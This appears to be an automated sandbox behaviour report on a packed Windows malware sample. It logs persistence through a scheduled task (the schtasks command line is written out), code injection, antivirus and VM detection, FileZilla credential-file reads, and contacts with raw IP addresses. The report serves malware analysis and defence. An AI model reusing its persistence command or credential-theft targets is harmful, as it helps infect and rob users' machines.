InternetReadFile Aug. 2, 2023, 4:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdMäGdð.&ì >xÌ@ ä6Ó` B d¥Ê,6 ä(° ( °ëÔ`` àø~iÚ@À PN"Xj@@ Pzj@@ pj@@.bss>jÀ p Ðj@À `àj@À ðj@À.rsrc¥j@À 0 &n@B.idata n@À.tls° ,nÀ.themidaÀ+À .n`à.bootÌ.n``.relocä6@x·ÐÿSiÕ¥È8¤ÝtCO>ï¯_H\|CÄsµOW6+LT÷»ÿrãd¶®ªWÓò¥y íñiàÒJ6?WÎ"Û²ÏÒºî¤}å~¥@6$ýÚÎT¯:É ÏÃË¸5Növtãà ÓHU\9Þ¼´KÐwøÅßì`¥!2Æ.Ãü0\Å:<f³-û¥I xô°+mRÀáv ªµ)ó$6Ó\|÷à¡ág6°}©ë\ ê¹v»s:ßÌÐ¶q78¢6\|M>Æ9Ãa<§ð½_±Ó\Ðta£}éIyBSÜ{»XÅ2àÀmóyZ9U½6ÿNªæJ¸¬¡T´;ï¯GáàáæßðµÓ°#ý¤ÞP¤î¼©åË÷è¿zìÊ;¬4Ð%x@¾IÑdÃ4Ë¡Å÷sîÍ'»ú:âÂõo÷àC>¨fqGOI;ÄgvÂ9\fÒöNIÀë,áÏþ;8¼9+§s$ë\|æî÷6×«Á#¬B{½v¤è]×Bîr²}Ee¿îHóÆCh`¥¯ëHvàÇo¯@±tè×îJ.;°¹Ëk÷Û5²ã5û+Õ/ªê7ßp6ã~ËfÊá[HÄp0g¡[âYýa(ÖÅ<½B9¸KÑÔkq6¶òö~x züô÷ \|ê'Þ¾öÇn0Sl~Ó58y%#ÁÞ¦Ï»Ýù·c¨»duWÈ ÖÐXå>¨TêyÞÓø;Ü:Z}ñºÑ.#.^è L¸§h}ëgj,ûIÙ51¾ùx·!AÁÓ¬(Ñi©Uï¤äØ6ÐåÎùóÍ¥CuR¯#«Ê5uÈ2t´¯-:ÒÆ×ßè±õÛ·°yâ¢ QÀ ºÔy [Ðµ´Úýµ&xË%ØDöp?ÀMOÝ{TÕÌ\|ùõYfXÕH8UÎýîÈèó¨ÕêC¶¿§êo\|JàlWKÅÎy¤,Øê WMxERE°"¿k}¼ÄCÀ¶\ñ»äI£I5 zkO/,óx¿¢ øêe¥ë1à;Ûªk´í4Ù`=êïçxHßb¿lÜËÁÐ8¯Ë&ÃðÅÕ4õ¶ÁÜuÂ×^LÓç]«TH«,^0ÕgðÊÏiïÝY«¤Ù0ÿWóhxÚ 1BÙÓÅ4X¸ëc.9>æLÊOù sÕê©w¼8£gÌ¨ØKÏw´äDÂî\|Xø:´)ªoÝÝ03¸ßcÀ¾YyPÂ¤Koß-Ø²_óÄÎ¨KÉo´F+«GnZÃ±G77@à4G¸g°q7ÎA²Ú+ÍÇG"S@°Í¿Ï Cé\´»6@UÏ@}ø1´Ø7E Ã¿Oû!¿Y]»´GBÈÃ¡6×yÆ1¯¸QZ+' «SÙÀ[DßÃp Lkm®ó2]ú¯g#WÂX{øX4YXácGMU5-KLÖÂ¡=,Úq,=~ß'¥g#·ÝF«óY9FFgOÃèçc#Îé¬M.60>Ó£¯ùÛO> kÓÙPDü£PNà³²ÚóËßó³vùÿÛÙ8EDÛgJ¼?J{Dö4ßXBá³²wÉ·[DqA7íEc°D?srzØ& ¥¸M2uY)Mn#5Á7þX\|£^J[§Ç#ÆûØÂ"¼[¶ßÒ] ?³!ÕKo°)1hQîºEºÃ ª¸Q0:+9$ÙÃB [yÖ«<¸ I%cÕÝa÷y»ÃGÎIÚEÀKëwð%ØZ¡ÿèMA%ã]=øf¼?ý£×[³ù.í³ß?½iÝÁËa®·÷C£JvÅêiÒ)ËoÍ'F¦< Ëþw³jÈ%óHó4@ñßæÝ»kã¯ûß¿Æ%ÈbódãWÑiáqÒ Â£!ë0ùÌÛ¥gv!wYý¡³uøcéJ§Mä§Mã§ Å_½_8½_½rÙ/å?¨B7fâÝhGéòcÿpÚ¶¤p!4Íÿ»ÿJÏXò¯§m?®Ø¤þ07ÅJb#ýë»ÒÕ÷ÂS½RØ `·]×¿¨JKß´HÚ¢'ßmØs³QH&¤uÃ«¾ï0ý¾äÂ#û·¢yõ"I³N³Ný&²BãÝ±OÊ&EóOê c·]×J¨ìK«ß´HÚ½+4¸ñC×BOÉØù]D?¹u¾,ÌÙ-ÒDÙ3ØÞÑ¨Yt8¥äÀ¦Òæ£tYy?c#sòáNº³àPõ£Ã¾\|Å+#B¶yM%³vNýû±Ê÷áòèòê×··]B×a¨yJåcJßH+Ú'ßØê³ýPá£Ã¾[Å#\|¶yuØùñ\ÒJ.ìi5àí¨7ÖÔ.·ÒT)ä=3'ßE«_dýøuIlÓÝU%Ú¨Õ©²Ä¸°ÐÊ½ÃÂÜ+_¼ÿAð Ðµ/#¸³E÷MÔ4Êï+Ñ;4`¥äÔÔ¹´KÐ¯Pd+àáÊvÜy-#@^Ëÿi³Êsi¾+òKõ±3´5ÇNM~Ø©ÂKWáê¢À³xÊÙ~34¿Á;C`@G£HD²ôã-$4¾³ÐøCh3~ ÄS!$G~2Àß\N¨íX>`wA'þ;ùyÚ´'}¿YÎÒ¨ÌR>°Ú[¢JoÓ3¤¶¸{ï7ÒL_úM7ÌÀßÜM¨uY>øwÁ!óÛÊeØø!3Êi¿Yô×ïË3vpJÇaÃåòQm#×¿¸#ì²ÆÓãkHµ?KD&ôã4F_3uf÷nå¥®8ÿ8IÇÁaÃåRw¿¸ëê²~Ñã_ÀL¸ýÃ#ÂØ;PUx~G²e¿«¥AkQk¿Q´lË{ÿm¹HSQ¨at>^ëÞªÐY Ê`d×2óÿÅÞ¨¿21½ÃÂÓt*ËAþ®IùâJâÐ¦\|7Ø#5ÿ ¥#%ë request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00656200', u'virtual_address': u'0x003a5000', u'entropy': 7.971069979796267, u'name': u'.<.<.<.<', u'virtual_size': u'0x00656090'}

entropy

7.9710699798

description

A section with a high entropy has been found

entropy

0.969228471133

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 2, 2023, 4:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (10 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000007e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: AddressBook base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: Connection Manager base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: DirectDrawEx base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: EditPlus base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: ENTERPRISE base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: Fontcore base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: Google Chrome base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: IE40 base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: IE4Data base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: IE5BAKEX base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: IEData base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: MobileOptionPack base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: SchedulingAgent base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: WIC base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Aug. 2, 2023, 4:57 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000007e4 key_handle: 0x000007f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: ef5ec869560af4fe517db7df1f8f0c15f044a584

Communicates with host for which no DNS query was performed (3 events)

host	128.199.192.86
host	194.180.49.153
host	45.15.156.208

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

Creates an executable file in a user folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 2, 2023, 4:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2324 process_handle: 0x0000002c	1	1	0

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
